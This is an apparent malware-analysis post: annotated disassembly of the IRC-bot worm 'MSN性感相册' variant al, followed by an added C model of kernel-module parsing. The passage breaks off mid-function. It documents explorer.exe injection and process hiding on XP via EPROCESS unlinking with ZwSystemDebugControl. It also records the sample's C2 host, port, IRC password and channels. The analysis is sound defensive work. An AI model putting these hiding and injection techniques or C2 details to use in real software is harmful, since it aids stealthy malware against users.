[Original] Disassembly and reverse-engineering notes on the worm "MSN性感相册" (MSN Sexy Photo Album), variant al (with a manual-unpacking section)
I like getting "featured" too, heh. Thanks for the support.
Uploading the "worm 'MSN性感相册' variant al disassembly and reverse-engineering notes (with manual unpacking section)" as a text document, for easier downloading. Time was short, so this is only a rough analysis; mistakes are unavoidable, please point them out, thanks!
----------------------------------------------------------------------------------------------------
2. Analysis of what the sample does once it starts its malicious behaviour:

00402D14  FF15 88804000        CALL DWORD PTR DS:[408088]         ; ntdll.RtlGetLastWin32Error (if s2 == s1 in the check above, the malicious path starts here).
00402D1A  3D B7000000          CMP EAX,0B7                        ; 0xB7 = ERROR_ALREADY_EXISTS (EAX was 0x51D in this debug session).
00402D1F  75 08                JNZ SHORT waccs.00402D29           ; any other error code: continue.
00402D21  6A 00                PUSH 0
00402D23  FF15 84804000        CALL DWORD PTR DS:[408084]         ; kernel32.ExitProcess(0): another instance already owns the object, so this copy exits.
00402D29  8D85 54FCFFFF        LEA EAX,DWORD PTR SS:[EBP-3AC]
00402D2F  50                   PUSH EAX                           ; /pWSAData = 0012FC14
00402D30  68 02020000          PUSH 202                           ; |RequestedVersion = 2.2
00402D35  FF15 DC814000        CALL DWORD PTR DS:[4081DC]         ; WS2_32.WSAStartup (initialise WinSock 2.2).
00402D3B  85C0                 TEST EAX,EAX                       ; 0 = success.
00402D3D  74 1E                JE SHORT waccs.00402D5D
00402D3F  8D85 54FCFFFF        LEA EAX,DWORD PTR SS:[EBP-3AC]
00402D45  50                   PUSH EAX
00402D46  68 01010000          PUSH 101                           ; RequestedVersion = 1.1
00402D4B  FF15 DC814000        CALL DWORD PTR DS:[4081DC]         ; WS2_32.WSAStartup (fallback: WinSock 1.1).
00402D51  85C0                 TEST EAX,EAX
00402D53  74 08                JE SHORT waccs.00402D5D
00402D55  6A 01                PUSH 1
00402D57  FF15 84804000        CALL DWORD PTR DS:[408084]         ; kernel32.ExitProcess(1): no usable WinSock, give up.
00402D5D  8D85 4CFCFFFF        LEA EAX,DWORD PTR SS:[EBP-3B4]     ; out: wServicePackMajor
00402D63  50                   PUSH EAX
00402D64  8D85 B0F9FFFF        LEA EAX,DWORD PTR SS:[EBP-650]     ; out: dwMinorVersion
00402D6A  50                   PUSH EAX
00402D6B  8D85 48FCFFFF        LEA EAX,DWORD PTR SS:[EBP-3B8]     ; out: dwMajorVersion
00402D71  50                   PUSH EAX
00402D72  E8 2D120000          CALL waccs.00403FA4                ; get the OS version (GetVersionExA wrapper, listed below).
00402D77  83C4 0C              ADD ESP,0C
00402D7A  83BD 48FCFFFF 0>     CMP DWORD PTR SS:[EBP-3B8],5       ; dwMajorVersion == 5?
00402D81  75 31                JNZ SHORT waccs.00402DB4           ; not 5.x: skip the process-hiding step.
00402D83  83BD B0F9FFFF 0>     CMP DWORD PTR SS:[EBP-650],1       ; dwMinorVersion == 1?  (5.1 = Windows XP; the EPROCESS offsets hard-coded in 00406455 are XP-specific, hence the gate)
00402D8A  75 28                JNZ SHORT waccs.00402DB4           ; not XP: skip the process-hiding step.
00402D8C  8D8D 98F8FFFF        LEA ECX,DWORD PTR SS:[EBP-768]     ; this = hiding context
00402D92  E8 15380000          CALL waccs.004065AC                ; enable SeDebugPrivilege, find the kernel image base (ntkrnlpa.exe), compute the kernel address of the exported variable PsInitialSystemProcess and read it via ZwSystemDebugControl (listed below).
00402D97  FF15 80804000        CALL DWORD PTR DS:[408080]         ; kernel32.GetCurrentProcessId
00402D9D  50                   PUSH EAX
00402D9E  8D8D 98F8FFFF        LEA ECX,DWORD PTR SS:[EBP-768]
00402DA4  E8 AC360000          CALL waccs.00406455                ; hide the own process from ring 3 by unlinking its EPROCESS from ActiveProcessLinks (DKOM done with kernel writes through ZwSystemDebugControl).
00402DA9  8D8D 98F8FFFF        LEA ECX,DWORD PTR SS:[EBP-768]
00402DAF  E8 E6380000          CALL waccs.0040669A                ; free the context.
00402DB4  68 B581D32E          PUSH 2ED381B5                      ; string-decryption key
00402DB9  8D8D 70F8FFFF        LEA ECX,DWORD PTR SS:[EBP-790]
00402DBF  E8 0C030000          CALL waccs.004030D0                ; decrypt stack string -> "t3x0"
00402DC4  50                   PUSH EAX                           ; MutexName = "t3x0"
00402DC5  6A 00                PUSH 0
00402DC7  6A 00                PUSH 0
00402DC9  FF15 7C804000        CALL DWORD PTR DS:[40807C]         ; kernel32.CreateMutexA("t3x0")
00402DCF  A3 D4A04000          MOV DWORD PTR DS:[40A0D4],EAX      ; mutex handle -> global.
00402DD4  8D8D 70F8FFFF        LEA ECX,DWORD PTR SS:[EBP-790]
00402DDA  E8 47F2FFFF          CALL waccs.00402026                ; wipe the decrypted string buffer.
00402DDF  68 BD81D32E          PUSH 2ED381BD
00402DE4  8D8D 68F8FFFF        LEA ECX,DWORD PTR SS:[EBP-798]
00402DEA  E8 E1020000          CALL waccs.004030D0                ; decrypt stack string -> "t3x0"
00402DEF  50                   PUSH EAX                           ; mutex name passed on to the injected stub
00402DF0  E8 1B270000          CALL waccs.00405510                ; inject a watchdog stub into explorer.exe (the desktop shell) and start it with CreateRemoteThread (listed below).
00402DF5  59                   POP ECX
00402DF6  A3 D8A04000          MOV DWORD PTR DS:[40A0D8],EAX      ; remote thread handle -> global.
00402DFB  8D8D 68F8FFFF        LEA ECX,DWORD PTR SS:[EBP-798]
00402E01  E8 20F2FFFF          CALL waccs.00402026                ; wipe the decrypted string buffer.
00402E06  68 18010000          PUSH 118                           ; n = 0x118
00402E0B  6A 00                PUSH 0
00402E0D  8D85 E4FDFFFF        LEA EAX,DWORD PTR SS:[EBP-21C]     ; bot context: +0 socket, +4 host name, +0x84 port, +0x88 password, +0xA1/+0xBA/+0xD3 channel strings
00402E13  50                   PUSH EAX
00402E14  E8 21420000          CALL waccs.0040703A                ; JMP to msvcrt.memset: zero the context.
00402E19  83C4 0C              ADD ESP,0C
00402E1C  68 10270000          PUSH 2710                          ; Timeout = 10000 ms (consumed by WaitForSingleObject below)
00402E21  68 9B15572C          PUSH 2C57159B
00402E26  8D8D 5CF8FFFF        LEA ECX,DWORD PTR SS:[EBP-7A4]
00402E2C  E8 FF020000          CALL waccs.00403130                ; decrypt stack string -> "$msr"
00402E31  50                   PUSH EAX                           ; /MutexName = "$msr"
00402E32  6A 00                PUSH 0                             ; |InitialOwner = FALSE
00402E34  6A 00                PUSH 0                             ; |pSecurity = NULL
00402E36  FF15 7C804000        CALL DWORD PTR DS:[40807C]         ; kernel32.CreateMutexA
00402E3C  8985 F0FEFFFF        MOV DWORD PTR SS:[EBP-110],EAX
00402E42  FFB5 F0FEFFFF        PUSH DWORD PTR SS:[EBP-110]        ; hMutex
00402E48  FF15 78804000        CALL DWORD PTR DS:[408078]         ; kernel32.WaitForSingleObject(hMutex, 10000)
00402E4E  2D 02010000          SUB EAX,102                        ; 0x102 = WAIT_TIMEOUT
00402E53  F7D8                 NEG EAX
00402E55  1BC0                 SBB EAX,EAX
00402E57  40                   INC EAX                            ; AL = (result == WAIT_TIMEOUT) ? 1 : 0
00402E58  8885 64F8FFFF        MOV BYTE PTR SS:[EBP-79C],AL
00402E5E  8D8D 5CF8FFFF        LEA ECX,DWORD PTR SS:[EBP-7A4]
00402E64  E8 BDF1FFFF          CALL waccs.00402026                ; wipe the decrypted string buffer.
00402E69  0FB685 64F8FFFF      MOVZX EAX,BYTE PTR SS:[EBP-79C]
00402E70  85C0                 TEST EAX,EAX
00402E72  74 05                JE SHORT waccs.00402E79
00402E74  E8 2F420000          CALL waccs.004070A8                ; JMP to msvcrt._endthread: another bot thread holds "$msr", so this one ends.
00402E79  8D85 B8FAFFFF        LEA EAX,DWORD PTR SS:[EBP-548]
00402E7F  50                   PUSH EAX                           ; /pWSAData = 0012FA78
00402E80  68 02020000          PUSH 202                           ; |RequestedVersion = 2.2
00402E85  FF15 DC814000        CALL DWORD PTR DS:[4081DC]         ; WS2_32.WSAStartup
00402E8B  83A5 50FCFFFF 0>     AND DWORD PTR SS:[EBP-3B0],0
00402E92  6A 19                PUSH 19                            ; /maxlen = 0x19 (25)
00402E94  68 6A2A944C          PUSH 4C942A6A
00402E99  8D8D 50F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7B0]
00402E9F  E8 EC020000          CALL waccs.00403190                ; decrypt stack string -> "##ghetto##"
00402EA4  50                   PUSH EAX                           ; |src = "##ghetto##" (IRC channel name)
00402EA5  8D85 85FEFFFF        LEA EAX,DWORD PTR SS:[EBP-17B]     ; ctx+0xA1
00402EAB  50                   PUSH EAX                           ; |dest = 0012FE45
00402EAC  E8 EB410000          CALL waccs.0040709C                ; JMP to msvcrt.strncpy
00402EB1  83C4 0C              ADD ESP,0C
00402EB4  8D8D 50F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7B0]
00402EBA  E8 B7F1FFFF          CALL waccs.00402076                ; wipe the decrypted string buffer.
00402EBF  6A 19                PUSH 19                            ; /maxlen = 0x19 (25)
00402EC1  68 75F453B3          PUSH B353F475
00402EC6  8D8D 48F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7B8]
00402ECC  E8 1F030000          CALL waccs.004031F0                ; decrypt stack string -> "3atsh1t"
00402ED1  50                   PUSH EAX                           ; |src = "3atsh1t" (stored right after the channel name; most likely the channel key)
00402ED2  8D85 9EFEFFFF        LEA EAX,DWORD PTR SS:[EBP-162]     ; ctx+0xBA
00402ED8  50                   PUSH EAX                           ; |dest = 0012FE5E
00402ED9  E8 BE410000          CALL waccs.0040709C                ; JMP to msvcrt.strncpy
00402EDE  83C4 0C              ADD ESP,0C
00402EE1  8D8D 48F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7B8]
00402EE7  E8 EAF0FFFF          CALL waccs.00401FD6                ; wipe the decrypted string buffer.
00402EEC  6A 19                PUSH 19                            ; /maxlen = 0x19 (25)
00402EEE  68 36A1576B          PUSH 6B57A136
00402EF3  8D8D 38F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7C8]
00402EF9  E8 52030000          CALL waccs.00403250                ; decrypt stack string -> "##ghetto-s##"
00402EFE  50                   PUSH EAX                           ; |src = "##ghetto-s##" (second IRC channel name)
00402EFF  8D85 B7FEFFFF        LEA EAX,DWORD PTR SS:[EBP-149]     ; ctx+0xD3
00402F05  50                   PUSH EAX                           ; |dest = 0012FE77
00402F06  E8 91410000          CALL waccs.0040709C                ; JMP to msvcrt.strncpy
00402F0B  83C4 0C              ADD ESP,0C
00402F0E  8D8D 38F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7C8]
00402F14  E8 CF000000          CALL waccs.00402FE8                ; wipe the decrypted string buffer.
00402F19  6A 01                PUSH 1
00402F1B  58                   POP EAX
00402F1C  85C0                 TEST EAX,EAX                       ; while (1): the condition is a constant.
00402F1E  0F84 BD000000        JE waccs.00402FE1
00402F24  68 80000000          PUSH 80                            ; /maxlen = 0x80 (128)
00402F29  68 C8F8D8A9          PUSH A9D8F8C8
00402F2E  8D8D 24F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7DC]
00402F34  E8 77030000          CALL waccs.004032B0                ; decrypt stack string -> "secure.freebsd.la" (the attacker's C2 host name, stored encrypted).
00402F39  50                   PUSH EAX                           ; |src = "secure.freebsd.la"
00402F3A  8D85 E8FDFFFF        LEA EAX,DWORD PTR SS:[EBP-218]     ; ctx+4 = host name
00402F40  50                   PUSH EAX                           ; |dest = 0012FDA8
00402F41  E8 56410000          CALL waccs.0040709C                ; JMP to msvcrt.strncpy
00402F46  83C4 0C              ADD ESP,0C
00402F49  8D8D 24F8FFFF        LEA ECX,DWORD PTR SS:[EBP-7DC]
00402F4F  E8 92EFFFFF          CALL waccs.00401EE6                ; wipe the decrypted string buffer.
00402F54  6A 19                PUSH 19                            ; maxlen = 0x19 (25)
00402F56  68 24DC4A5C          PUSH 5C4ADC24
00402F5B  8D8D 1CF8FFFF        LEA ECX,DWORD PTR SS:[EBP-7E4]
00402F61  E8 AA030000          CALL waccs.00403310                ; decrypt stack string -> "su1c1d3"
00402F66  50                   PUSH EAX                           ; |src = "su1c1d3" (IRC server password, see "PASS %s" below)
00402F67  8D85 6CFEFFFF        LEA EAX,DWORD PTR SS:[EBP-194]     ; ctx+0x88
00402F6D  50                   PUSH EAX                           ; |dest = 0012FE2C
00402F6E  E8 29410000          CALL waccs.0040709C                ; JMP to msvcrt.strncpy
00402F73  83C4 0C              ADD ESP,0C
00402F76  8D8D 1CF8FFFF        LEA ECX,DWORD PTR SS:[EBP-7E4]
00402F7C  E8 55F0FFFF          CALL waccs.00401FD6                ; wipe the decrypted string buffer.
00402F81  C785 68FEFFFF 4>     MOV DWORD PTR SS:[EBP-198],2646    ; ctx+0x84 = port 0x2646 = 9798
00402F8B  8D85 E4FDFFFF        LEA EAX,DWORD PTR SS:[EBP-21C]
00402F91  50                   PUSH EAX                           ; ctx
00402F92  E8 13E1FFFF          CALL waccs.004010AA                ; connect to the C2 server secure.freebsd.la on TCP port 0x2646 (9798) (listed below).
00402F97  59                   POP ECX
00402F98  0FB6C0               MOVZX EAX,AL
00402F9B  85C0                 TEST EAX,EAX
00402F9D  74 32                JE SHORT waccs.00402FD1            ; connection failed: sleep and retry.
00402F9F  8D85 E4FDFFFF        LEA EAX,DWORD PTR SS:[EBP-21C]
00402FA5  50                   PUSH EAX
00402FA6  E8 98E1FFFF          CALL waccs.00401143                ; send the IRC login (starts with "PASS su1c1d3"; listed below).
00402FAB  59                   POP ECX
00402FAC  0FB6C0               MOVZX EAX,AL
00402FAF  85C0                 TEST EAX,EAX
00402FB1  74 1E                JE SHORT waccs.00402FD1
00402FB3  8D85 E4FDFFFF        LEA EAX,DWORD PTR SS:[EBP-21C]
00402FB9  50                   PUSH EAX
00402FBA  E8 4AE5FFFF          CALL waccs.00401509                ; receive data from the C2 server and execute the attacker's commands.
00402FBF  59                   POP ECX
00402FC0  0FB6C0               MOVZX EAX,AL
00402FC3  85C0                 TEST EAX,EAX
00402FC5  74 0A                JE SHORT waccs.00402FD1            ; connection dropped: fall through to the reconnect delay.
00402FC7  6A 0A                PUSH 0A                            ; /Timeout = 10 ms
00402FC9  FF15 6C804000        CALL DWORD PTR DS:[40806C]         ; kernel32.Sleep(10)
00402FCF  ^ EB E2              JMP SHORT waccs.00402FB3           ; command loop (00402FB3-00402FCF): keep receiving and executing C2 commands.
00402FD1  68 30750000          PUSH 7530                          ; /Timeout = 30000 ms
00402FD6  FF15 6C804000        CALL DWORD PTR DS:[40806C]         ; kernel32.Sleep(30000)
00402FDC  ^ E9 38FFFFFF        JMP waccs.00402F19                 ; outer loop (00402F19-00402FDC): reconnect to the C2 server every 30 s.
00402FE1  E8 C2400000          CALL waccs.004070A8                ; JMP to msvcrt._endthread
00402FE6  C9                   LEAVE
00402FE7  C3                   RETN
----------------------------------------------------------
Get the OS version (helper called at 00402D72; writes dwMajorVersion, dwMinorVersion and wServicePackMajor to the three out-pointers):
00403FA4  55                   PUSH EBP
00403FA5  8BEC                 MOV EBP,ESP
00403FA7  81EC 9C000000        SUB ESP,9C                         ; OSVERSIONINFOEXA (0x9C bytes) at EBP-9C
00403FAD  C785 64FFFFFF 9>     MOV DWORD PTR SS:[EBP-9C],9C       ; dwOSVersionInfoSize
00403FB7  8D85 64FFFFFF        LEA EAX,DWORD PTR SS:[EBP-9C]
00403FBD  50                   PUSH EAX
00403FBE  FF15 B0804000        CALL DWORD PTR DS:[4080B0]         ; kernel32.GetVersionExA
00403FC4  85C0                 TEST EAX,EAX
00403FC6  75 04                JNZ SHORT waccs.00403FCC           ; failed?
00403FC8  32C0                 XOR AL,AL                          ; return FALSE
00403FCA  EB 21                JMP SHORT waccs.00403FED
00403FCC  8B45 08              MOV EAX,DWORD PTR SS:[EBP+8]       ; arg1
00403FCF  8B8D 68FFFFFF        MOV ECX,DWORD PTR SS:[EBP-98]      ; dwMajorVersion (offset 4)
00403FD5  8908                 MOV DWORD PTR DS:[EAX],ECX
00403FD7  8B45 0C              MOV EAX,DWORD PTR SS:[EBP+C]       ; arg2
00403FDA  8B8D 6CFFFFFF        MOV ECX,DWORD PTR SS:[EBP-94]      ; dwMinorVersion (offset 8)
00403FE0  8908                 MOV DWORD PTR DS:[EAX],ECX
00403FE2  0FB745 F8            MOVZX EAX,WORD PTR SS:[EBP-8]      ; wServicePackMajor (offset 0x94)
00403FE6  8B4D 10              MOV ECX,DWORD PTR SS:[EBP+10]      ; arg3
00403FE9  8901                 MOV DWORD PTR DS:[ECX],EAX
00403FEB  B0 01                MOV AL,1                           ; return TRUE
00403FED  C9                   LEAVE
00403FEE  C3                   RETN
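The kernel-base discovery performed by the two routines listed next (0040638F enumerates kernel modules, 004065AC rebases the export) is easier to follow against a model than against the raw listing. The C program below is an added example written for this page, not code from the original post or from the sample: it lays out the 32-bit SystemModuleInformation (class 11) buffer the sample copies 0x120 bytes of (a count, then entries with ImageBase at buffer offset 0xC, OffsetToFileName at 0x1E and FullPathName at 0x20), parses entry 0 exactly as 0040638F does (FullPathName + OffsetToFileName) while adding the bounds check the sample omits, and applies the rebasing arithmetic of 0040665A-00406666. The module names, base addresses and the user-mode export address in the demo are constructed values, not taken from the sample.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* 32-bit RTL_PROCESS_MODULE_INFORMATION.  Pointers are 32-bit on the XP target,
 * so uint32_t reproduces the on-disk layout: entry size 0x11C, 0x120 with the
 * leading NumberOfModules count (the amount 0040638F copies with REP MOVSD). */
typedef struct {
    uint32_t Section;
    uint32_t MappedBase;
    uint32_t ImageBase;          /* +0x08 in the entry, +0x0C in the buffer ([EBP-120]) */
    uint32_t ImageSize;
    uint32_t Flags;
    uint16_t LoadOrderIndex;
    uint16_t InitOrderIndex;
    uint16_t LoadCount;
    uint16_t OffsetToFileName;   /* +0x1A in the entry, +0x1E in the buffer ([EBP-10E]) */
    uint8_t  FullPathName[256];  /* +0x1C in the entry, +0x20 in the buffer ([EBP-10C]) */
} module_entry_t;

/* Entry 0 of SystemModuleInformation is the kernel image.  Returns 1 and fills
 * *base and name on success, 0 on a short or malformed buffer. */
static int kernel_from_module_info(const uint8_t *buf, size_t len,
                                   uint32_t *base, char *name, size_t name_len) {
    uint32_t count;
    module_entry_t e;
    if (len < 4 + sizeof e) return 0;
    memcpy(&count, buf, 4);
    if (count == 0) return 0;
    memcpy(&e, buf + 4, sizeof e);
    /* the sample copies 256 - OffsetToFileName bytes without checking the offset */
    if (e.OffsetToFileName >= sizeof e.FullPathName) return 0;
    *base = e.ImageBase;
    snprintf(name, name_len, "%.*s", (int)(sizeof e.FullPathName - e.OffsetToFileName),
             (const char *)e.FullPathName + e.OffsetToFileName);
    return 1;
}

/* 0040665A-00406666: kernel VA of an export = (user-mode GetProcAddress result
 * - user-mode LoadLibraryA base) + the real kernel ImageBase. */
static uint32_t rebase_export(uint32_t user_proc, uint32_t user_base, uint32_t kernel_base) {
    return user_proc - user_base + kernel_base;
}

/* Constructed two-entry buffer; bases and paths are invented for the demo. */
static size_t build_demo_module_info(uint8_t *buf, size_t cap) {
    static const struct { uint32_t base; const char *path; } mods[] = {
        { 0x804D7000u, "\\WINDOWS\\system32\\ntkrnlpa.exe" },
        { 0x806E4000u, "\\WINDOWS\\system32\\hal.dll" },
    };
    uint32_t count = 2;
    size_t off = 4;
    if (cap < 4 + 2 * sizeof(module_entry_t)) return 0;
    memcpy(buf, &count, 4);
    for (int i = 0; i < 2; i++) {
        module_entry_t e;
        const char *slash = strrchr(mods[i].path, '\\');
        memset(&e, 0, sizeof e);
        e.ImageBase = mods[i].base;
        e.OffsetToFileName = (uint16_t)(slash ? slash + 1 - mods[i].path : 0);
        strncpy((char *)e.FullPathName, mods[i].path, sizeof e.FullPathName - 1);
        memcpy(buf + off, &e, sizeof e);
        off += sizeof e;
    }
    return off;
}

/* Kernel base and bare file name recovered from the constructed buffer. */
static uint32_t demo_kernel_base(void) {
    uint8_t buf[4 + 2 * sizeof(module_entry_t)];
    uint32_t base = 0;
    char name[64];
    build_demo_module_info(buf, sizeof buf);
    return kernel_from_module_info(buf, sizeof buf, &base, name, sizeof name) ? base : 0;
}

static const char *demo_kernel_name(void) {
    static char name[64];
    uint8_t buf[4 + 2 * sizeof(module_entry_t)];
    uint32_t base;
    build_demo_module_info(buf, sizeof buf);
    return kernel_from_module_info(buf, sizeof buf, &base, name, sizeof name) ? name : "";
}
```

With the debugger's user-mode values (LoadLibraryA returned 0x009B0000 for the kernel image) and an assumed GetProcAddress result of 0x009B1234, rebase_export gives 0x804D8234 for a kernel loaded at 0x804D7000; that is the address the sample then feeds to ZwSystemDebugControl. The same struct is what the detection side parses when checking which kernel modules are loaded, so the offsets are worth remembering.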
Enable SeDebugPrivilege, enumerate the loaded kernel modules to find the kernel image ("ntkrnlpa.exe"), resolve the exported variable PsInitialSystemProcess and read it from kernel memory with ZwSystemDebugControl. (ZwSystemDebugControl with the SysDbgReadVirtual/SysDbgWriteVirtual classes lets a process holding SeDebugPrivilege read and write arbitrary kernel memory from ring 3 on XP; the code never actually runs in ring 0. The one-argument helper 00405DD8 reads a DWORD, the two-argument helper 00405DFC writes one.)
004065AC  55                   PUSH EBP
004065AD  8BEC                 MOV EBP,ESP
004065AF  81EC 30010000        SUB ESP,130
004065B5  898D D4FEFFFF        MOV DWORD PTR SS:[EBP-12C],ECX     ; this (context: +0 privilege object, +4 System EPROCESS, +8/+C EPROCESS offsets)
004065BB  6A 01                PUSH 1
004065BD  E8 E00B0000          CALL waccs.004071A2                ; JMP to msvcrt.operator new(1)
004065C2  83C4 04              ADD ESP,4
004065C5  8985 F0FEFFFF        MOV DWORD PTR SS:[EBP-110],EAX
004065CB  83BD F0FEFFFF 0>     CMP DWORD PTR SS:[EBP-110],0
004065D2  74 13                JE SHORT waccs.004065E7
004065D4  8B8D F0FEFFFF        MOV ECX,DWORD PTR SS:[EBP-110]
004065DA  E8 A1F7FFFF          CALL waccs.00405D80                ; enable SeDebugPrivilege in the own token (listed below).
004065DF  8985 D0FEFFFF        MOV DWORD PTR SS:[EBP-130],EAX
004065E5  EB 0A                JMP SHORT waccs.004065F1
004065E7  C785 D0FEFFFF 0>     MOV DWORD PTR SS:[EBP-130],0
004065F1  8B85 D4FEFFFF        MOV EAX,DWORD PTR SS:[EBP-12C]
004065F7  8B8D D0FEFFFF        MOV ECX,DWORD PTR SS:[EBP-130]
004065FD  8908                 MOV DWORD PTR DS:[EAX],ECX         ; this->priv = object
004065FF  8D95 00FFFFFF        LEA EDX,DWORD PTR SS:[EBP-100]     ; out: kernel file name
00406605  52                   PUSH EDX
00406606  8D85 F4FEFFFF        LEA EAX,DWORD PTR SS:[EBP-10C]     ; out: kernel ImageBase
0040660C  50                   PUSH EAX
0040660D  8B8D D4FEFFFF        MOV ECX,DWORD PTR SS:[EBP-12C]
00406613  E8 77FDFFFF          CALL waccs.0040638F                ; enumerate kernel modules; entry 0 is the kernel image, here "ntkrnlpa.exe" (listed below).
00406618  8D8D 00FFFFFF        LEA ECX,DWORD PTR SS:[EBP-100]
0040661E  51                   PUSH ECX                           ; /FileName = "ntkrnlpa.exe"
0040661F  FF15 40804000        CALL DWORD PTR DS:[408040]         ; kernel32.LoadLibraryA: map the kernel image into this process like a DLL, only to parse its export table.
00406625  8985 F8FEFFFF        MOV DWORD PTR SS:[EBP-108],EAX
0040662B  68 99C8E33A          PUSH 3AE3C899
00406630  8D8D D8FEFFFF        LEA ECX,DWORD PTR SS:[EBP-128]
00406636  E8 15020000          CALL waccs.00406850                ; decrypt stack string -> "PsInitialSystemProcess"
0040663B  50                   PUSH EAX                           ; /ProcNameOrOrdinal = "PsInitialSystemProcess"
0040663C  8B95 F8FEFFFF        MOV EDX,DWORD PTR SS:[EBP-108]
00406642  52                   PUSH EDX                           ; |hModule = 009B0000 (ntkrnlpa)
00406643  FF15 44804000        CALL DWORD PTR DS:[408044]         ; kernel32.GetProcAddress: user-mode address of the exported variable PsInitialSystemProcess (a pointer to the System EPROCESS, not a function).
00406649  8985 FCFEFFFF        MOV DWORD PTR SS:[EBP-104],EAX
0040664F  8D8D D8FEFFFF        LEA ECX,DWORD PTR SS:[EBP-128]
00406655  E8 C6000000          CALL waccs.00406720                ; wipe the decrypted string buffer.
0040665A  8B85 FCFEFFFF        MOV EAX,DWORD PTR SS:[EBP-104]
00406660  2B85 F8FEFFFF        SUB EAX,DWORD PTR SS:[EBP-108]     ; RVA = address - user-mode base
00406666  0385 F4FEFFFF        ADD EAX,DWORD PTR SS:[EBP-10C]     ; + real kernel ImageBase = kernel VA of PsInitialSystemProcess
0040666C  50                   PUSH EAX
0040666D  8B8D D4FEFFFF        MOV ECX,DWORD PTR SS:[EBP-12C]
00406673  8B09                 MOV ECX,DWORD PTR DS:[ECX]
00406675  E8 5EF7FFFF          CALL waccs.00405DD8                ; read one DWORD of kernel memory via ZwSystemDebugControl: the System EPROCESS address.
0040667A  8B95 D4FEFFFF        MOV EDX,DWORD PTR SS:[EBP-12C]
00406680  8942 04              MOV DWORD PTR DS:[EDX+4],EAX       ; this->SystemEprocess
00406683  8B85 F8FEFFFF        MOV EAX,DWORD PTR SS:[EBP-108]
00406689  50                   PUSH EAX
0040668A  FF15 3C804000        CALL DWORD PTR DS:[40803C]         ; kernel32.FreeLibrary: unmap the kernel image again.
00406690  8B85 D4FEFFFF        MOV EAX,DWORD PTR SS:[EBP-12C]
00406696  8BE5                 MOV ESP,EBP
00406698  5D                   POP EBP
00406699  C3                   RETN
Enable SeDebugPrivilege in the current process token:
00405D80  55                   PUSH EBP
00405D81  8BEC                 MOV EBP,ESP
00405D83  83EC 18              SUB ESP,18
00405D86  894D E8              MOV DWORD PTR SS:[EBP-18],ECX      ; this
00405D89  8D45 EC              LEA EAX,DWORD PTR SS:[EBP-14]      ; &hToken
00405D8C  50                   PUSH EAX
00405D8D  6A 28                PUSH 28                            ; TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
00405D8F  FF15 C8804000        CALL DWORD PTR DS:[4080C8]         ; kernel32.GetCurrentProcess
00405D95  50                   PUSH EAX
00405D96  FF15 14804000        CALL DWORD PTR DS:[408014]         ; ADVAPI32.OpenProcessToken
00405D9C  C745 F0 0100000>     MOV DWORD PTR SS:[EBP-10],1        ; tp.PrivilegeCount = 1
00405DA3  C745 FC 0200000>     MOV DWORD PTR SS:[EBP-4],2         ; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED
00405DAA  8D4D F4              LEA ECX,DWORD PTR SS:[EBP-C]       ; &tp.Privileges[0].Luid
00405DAD  51                   PUSH ECX
00405DAE  68 20A04000          PUSH waccs.0040A020                ; "SeDebugPrivilege"
00405DB3  6A 00                PUSH 0                             ; lpSystemName = NULL
00405DB5  FF15 10804000        CALL DWORD PTR DS:[408010]         ; ADVAPI32.LookupPrivilegeValueA
00405DBB  6A 00                PUSH 0                             ; ReturnLength = NULL
00405DBD  6A 00                PUSH 0                             ; PreviousState = NULL
00405DBF  6A 10                PUSH 10                            ; BufferLength = sizeof(TOKEN_PRIVILEGES)
00405DC1  8D55 F0              LEA EDX,DWORD PTR SS:[EBP-10]
00405DC4  52                   PUSH EDX                           ; &tp
00405DC5  6A 00                PUSH 0                             ; DisableAllPrivileges = FALSE
00405DC7  8B45 EC              MOV EAX,DWORD PTR SS:[EBP-14]
00405DCA  50                   PUSH EAX                           ; hToken
00405DCB  FF15 0C804000        CALL DWORD PTR DS:[40800C]         ; ADVAPI32.AdjustTokenPrivileges. Neither the return value nor GetLastError is checked: for a non-administrator the privilege is simply not granted and the later ZwSystemDebugControl calls fail.
00405DD1  8B45 E8              MOV EAX,DWORD PTR SS:[EBP-18]
00405DD4  8BE5                 MOV ESP,EBP
00405DD6  5D                   POP EBP
00405DD7  C3                   RETN
Enumerate the loaded kernel modules and take entry 0, the kernel image ("ntkrnlpa.exe"):
0040638F  55                   PUSH EBP
00406390  8BEC                 MOV EBP,ESP
00406392  81EC 38010000        SUB ESP,138
00406398  56                   PUSH ESI
00406399  57                   PUSH EDI
0040639A  898D C8FEFFFF        MOV DWORD PTR SS:[EBP-138],ECX     ; this
004063A0  C745 FC 2001000>     MOV DWORD PTR SS:[EBP-4],120       ; initial length guess 0x120
004063A7  8D45 FC              LEA EAX,DWORD PTR SS:[EBP-4]
004063AA  50                   PUSH EAX                           ; &ReturnLength
004063AB  6A 00                PUSH 0                             ; Length = 0
004063AD  6A 00                PUSH 0                             ; Buffer = NULL
004063AF  6A 0B                PUSH 0B                            ; SystemModuleInformation (11)
004063B1  FF15 F4814000        CALL DWORD PTR DS:[4081F4]         ; ntdll.ZwQuerySystemInformation: size query; required length comes back in [EBP-4].
004063B7  8945 F8              MOV DWORD PTR SS:[EBP-8],EAX
004063BA  8B4D FC              MOV ECX,DWORD PTR SS:[EBP-4]
004063BD  51                   PUSH ECX
004063BE  E8 DF0D0000          CALL waccs.004071A2                ; JMP to msvcrt.operator new(ReturnLength)
004063C3  83C4 04              ADD ESP,4
004063C6  8985 D0FEFFFF        MOV DWORD PTR SS:[EBP-130],EAX
004063CC  8B95 D0FEFFFF        MOV EDX,DWORD PTR SS:[EBP-130]
004063D2  8955 F4              MOV DWORD PTR SS:[EBP-C],EDX
004063D5  6A 00                PUSH 0
004063D7  8B45 FC              MOV EAX,DWORD PTR SS:[EBP-4]
004063DA  50                   PUSH EAX                           ; Length
004063DB  8B4D F4              MOV ECX,DWORD PTR SS:[EBP-C]
004063DE  51                   PUSH ECX                           ; Buffer
004063DF  6A 0B                PUSH 0B                            ; SystemModuleInformation
004063E1  FF15 F4814000        CALL DWORD PTR DS:[4081F4]         ; ntdll.ZwQuerySystemInformation: fill the module list.
004063E7  8B75 F4              MOV ESI,DWORD PTR SS:[EBP-C]
